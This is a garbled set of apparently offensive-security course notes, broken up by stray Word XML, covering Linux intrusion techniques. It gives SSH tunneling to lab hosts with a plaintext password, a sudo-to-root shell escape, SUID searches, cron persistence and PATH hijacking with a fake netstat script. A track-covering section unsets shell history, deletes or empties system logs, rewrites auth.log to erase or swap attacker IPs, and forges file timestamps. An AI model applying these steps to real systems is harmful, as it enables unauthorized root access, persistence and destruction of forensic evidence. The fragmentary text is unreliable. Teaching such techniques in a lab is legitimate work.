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ssh student@10.50.35.200 -L 60699:10.10.28.42:22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AbL96ElEXErsWr9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ssh demo1@localhost -p 60699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password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ssh student@10.50.35.200 -D 9050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AbL96ElEXErsWr9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proxychains ssh demo1@10.10.28.42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password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https://gtfobins.github.io/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sudo -l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sudo apt-get changelog apt</w:t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!/bin/sh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#root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SUID/GUID (set-user ID)</w:t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chmod 777</w:t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uid=0(root) gid=0(root) groups=0(root)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*need to have the same permission as on the system*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find / -type f -perm /4000 -ls 2&gt;/dev/null (SUID)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/bin/netstat_natpu (ROOT PRIV)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netstat -natpu (NOT ROOT PRIV)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find / -type f -perm /2000 -ls 2&gt;/dev/null (SGID)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find / -type f -perm /6000 -ls 2&gt;/dev/null (SUID + SGID)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CRON (scheduled task in Linux aka persistence)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cat /etc/crontab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ab/>
        <w:t xml:space="preserve">/etc/cron.hourly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ab/>
        <w:t xml:space="preserve">/etc/cron.daily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ab/>
        <w:t xml:space="preserve">/etc/cron.weekly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ls -al /var/spool/cron/crontabs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ls -al /etc/cron.d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crontab -e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ls -al /etc/cron.daily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cat /etc/cron.daily/&lt;script file name&gt;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*script running in the bg &gt; write to a file aka /tmp or /var/tmp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echo $PATH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netstat runs from /bin directory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cd /tmp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vim mal.sh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chmod +x mal.sh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./mal.sh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/tmp/mal.sh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Hello world!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ls -al /bin/netstat_natpu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readelf -p .rodata /bin/netstat_natpi | head -n 4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cd /tmp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mv mal.sh netstat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ls -altr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echo $PATH (NOT PERSISTENT, THIS WILL READ FROM CURRENT DIR “/tmp”)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netstat (same as netstat_natpu)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Hello world!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cd ~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netstat (NORMAL NETSTAT)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Persistence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Covering Tracks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Artifacts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Work from /tmp directory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CPU/RAM usage (keep low profile)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echo $HISTFILE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/root/.bash_history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unset this variable $HISTFILE before inputting commands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man init (systemD is newer and common)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ausearch -p 22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ausearch -m USER_LOGIN -sv no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ausearch -ua edwards -ts yesterday -te now -i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w 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last (wtmp)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lastb (bad login)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lastlog (last time a user has logged into the system)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ls -altr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b w:val="1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cleaning log files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file /var/log/wtmp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find /var/log -type f -mmin -10 2&gt; /dev/null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journalctl -f -u ssh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journalctl -q SYSLOG_FACILITY=10 SYSLOG_FACILITY=4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cat /var/log/auth.log | egrep -v "opened|closed"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awk '/opened/' /var/log/auth.log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last OR lastb OR lastlog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strings OR dd            # for data files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more /var/log/syslog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head/tail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rm -rf /var/log/...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cat /dev/null &gt; /var/log/...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echo &gt; /var/log/...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Remove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egrep -v '10:49*| 15:15:15' auth.log &gt; auth.log2; cat auth.log2 &gt; auth.log; rm auth.log2 +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Replace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cp auth.log &gt; auth.log2; sed -i 's/10.16.10.93/136.132.1.1/g' auth.log2; cat auth.log2 &gt; auth.log +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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*^Active system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touch -r 3.txt 1.txt    # Reference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tfobins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